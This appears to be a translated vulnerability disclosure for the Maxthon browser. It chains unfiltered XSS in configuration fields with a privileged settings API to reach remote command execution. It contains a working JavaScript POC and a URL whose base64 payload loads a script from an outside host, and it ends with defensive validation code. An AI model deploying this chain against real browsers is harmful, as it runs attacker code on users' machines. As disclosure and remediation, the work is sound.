Ao you Browser Remote Command Execution Vulnerability
Ao you browser has been updated to 4.4.900.
Downloading the latest version shows that the XSS in the configuration center's "add home page" function has been fixed. However, two more XSS can still be found.
1st. In the configuration center there is a "direct website address" function, and the alias entered there is not filtered.
2nd. This one is more hidden. In the "add one-click" function, the shortcut key can only be chosen from F1-F12, so there is apparently no way to change the shortcut key directly.
However, testing showed that it can be modified through the API provided by Ao you.
Changing F1 to "> shows that the shortcut key is not filtered either.
Browser settings can be changed with maxthon.browser.config.ConfigManager, and any *.maxthon.cn page can call this API, so all that is needed is an XSS on *.maxthon.cn, which is not hard to find.
Because mx://res/notification/ can call maxthon.program, and mx://res/app/%7B33CA60D6-EADC-4558-9185-2EBE14214AB9%7D/index.htm can call maxthon.io, the methods described in WooYun: remote command execution vulnerability in the Ao you browser (Web Client + client exploitation skills) can be used to construct the following POC:
b = [{'">':"www.qq.com"},{"F2":""},{"F3":""},{"F4":""},{"F5":""},{"F6":""},{"F7":""},{"F8":""},{"F9":""},{"F10":""},{"F11":""},{"F12":""}];
c = window.JSON.stringify(b);
maxthon.browser.config.ConfigManager.set("maxthon.config", "browser.general.targeturl.shortcuts", c);
maxthon.browser.config.ConfigManager.set("maxthon.config", "browser.general.startpage", "mx://res/options/index.htm");
Then the XSS on *.maxthon.cn is used to call the POC above.
Http://tuan.maxthon.cn/en_US/search/all/Ij48c2NyaXB0IHNyYz1odHRwOi8vdXRmNy5tbC90L21heHRob24yLmpzPjwvc2NyaXB0Pg==
In addition, Ao you browser has a design defect: the set of peripheral privileged websites is far too wide. Even if the local privileged domain itself has no XSS,
an XSS on any privileged website can do a great deal. For example, the maxthon.browser.config.ConfigManager API can modify every browser setting, such as adding a proxy server.
Actual test:
After accessing the URL above, a test.bat file is written to drive D and run the next time the browser starts.
Test version
Solution:
1. Do not refer to the supplementary
2. Narrow the scope of peripheral privileged websites
3. Repair the XSS
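As an added example (not Maxthon's own code), this is how solution items 2 and 3 could look on the side that stores and renders the shortcut list written by the POC above: the shortcut key is restricted to F1-F12 at the API layer, targets are normalised to http(s) URLs, every value is HTML-escaped before it reaches the options page, and the privileged API checks an exact-origin allowlist rather than *.maxthon.cn. The [{key: url}] data shape is taken from the POC; the allowlist contents and the row markup are assumptions.

```javascript
// Added example, not Maxthon's own code: validate the [{key: url}] shortcut list the POC
// writes, escape it when rendered, and gate the privileged API on exact origins.
const SHORTCUT_KEY_RE = /^F([1-9]|1[0-2])$/;           // only the keys the UI offers
const PRIVILEGED_ORIGINS = new Set(["mx://res"]);       // placeholder allowlist (assumption), no wildcards

function isPrivilegedOrigin(origin) {
  return PRIVILEGED_ORIGINS.has(origin);   // exact match, so tuan.maxthon.cn etc. are not privileged
}

// HTML-escape a value before it is concatenated into the options page markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Returns {ok: true, shortcuts} with a normalised copy, or {ok: false, reason}.
function validateShortcuts(shortcuts) {
  if (!Array.isArray(shortcuts)) return { ok: false, reason: "not an array" };
  const seen = new Set();
  const out = [];
  for (const entry of shortcuts) {
    const keys = Object.keys(entry || {});
    if (keys.length !== 1) return { ok: false, reason: "entry must map exactly one key" };
    const key = keys[0];
    if (!SHORTCUT_KEY_RE.test(key)) return { ok: false, reason: "shortcut key not in F1-F12" };
    if (seen.has(key)) return { ok: false, reason: "duplicate shortcut key " + key };
    seen.add(key);
    const target = entry[key];
    if (typeof target !== "string") return { ok: false, reason: "target must be a string" };
    let href = "";
    if (target !== "") {
      let parsed;
      // Bare hostnames such as "www.qq.com" are accepted; give them a scheme before parsing.
      try { parsed = new URL(/^[a-z][a-z0-9+.-]*:/i.test(target) ? target : "https://" + target); }
      catch (e) { return { ok: false, reason: "malformed target for " + key }; }
      if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
        return { ok: false, reason: "scheme not allowed for " + key };
      }
      href = parsed.href;
    }
    out.push({ [key]: href });
  }
  return { ok: true, shortcuts: out };
}

// Render one options-page row with every user-controlled value escaped.
function renderShortcutRow(key, href) {
  return `<li><kbd>${escapeHtml(key)}</kbd> <a href="${escapeHtml(href)}">${escapeHtml(href)}</a></li>`;
}
```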